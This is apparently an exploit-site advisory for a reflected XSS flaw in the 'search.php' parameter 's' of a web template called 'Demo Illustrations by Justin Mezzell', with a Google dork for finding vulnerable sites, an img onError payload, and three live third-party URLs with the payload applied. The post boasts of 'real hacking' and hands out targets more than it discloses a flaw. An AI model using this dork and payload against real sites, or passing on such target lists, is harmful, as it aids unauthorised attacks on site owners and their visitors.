Demo Illustrations by Justin Mezzell reflected XSS

2019.06.16

ABDO10 (DZ)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: allintext:"Demo Illustrations by Justin Mezzell"

# [+] Title : Demo Illustrations by Justin Mezzell reflected XSS
# [+] Author (Discover) : ABDO10
# [+] Date : Jun, 16th 2019 
# [+] Dork : allintext:"Demo Illustrations by Justin Mezzell"

# [+] Poc Instructions : 
        + We have to dork in search engine 
        + we have to set payload on the vulnerable file "search.php" in the parameter "s" 
        + E.g [target]/[path]/search.php?s=<img src="xy"  onError=prompt(document.domain)>
 
# [+] Alive E.g :
        + http://www.plasticosajaco.com/search.php?s=<img src="xy"  onError=prompt(document.domain)>
        + https://nokesolutions.com/samples/codester/search.php?s=<img src="xy"  onError=prompt(document.domain)>
        + http://schoolnepal.org/search.php?s=<img src="xy"  onError=prompt(document.domain)>
           ``... and more ... This the real hacking #ahmed cmd`` 
            `` Greetz Lakarha_Family ``

See this note in RAW Version

Vote for this issue:

100%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

dj3bb4ran0n

| Date: 2019-06-16 18:56 CET+1

nice catch keep it up you should try bug hunting platforms

Demo Illustrations by Justin Mezzell reflected XSS

Dork: allintext:"Demo Illustrations by Justin Mezzell"

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Demo Illustrations by Justin Mezzell reflected XSS

Dork: allintext:"Demo Illustrations by Justin Mezzell"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.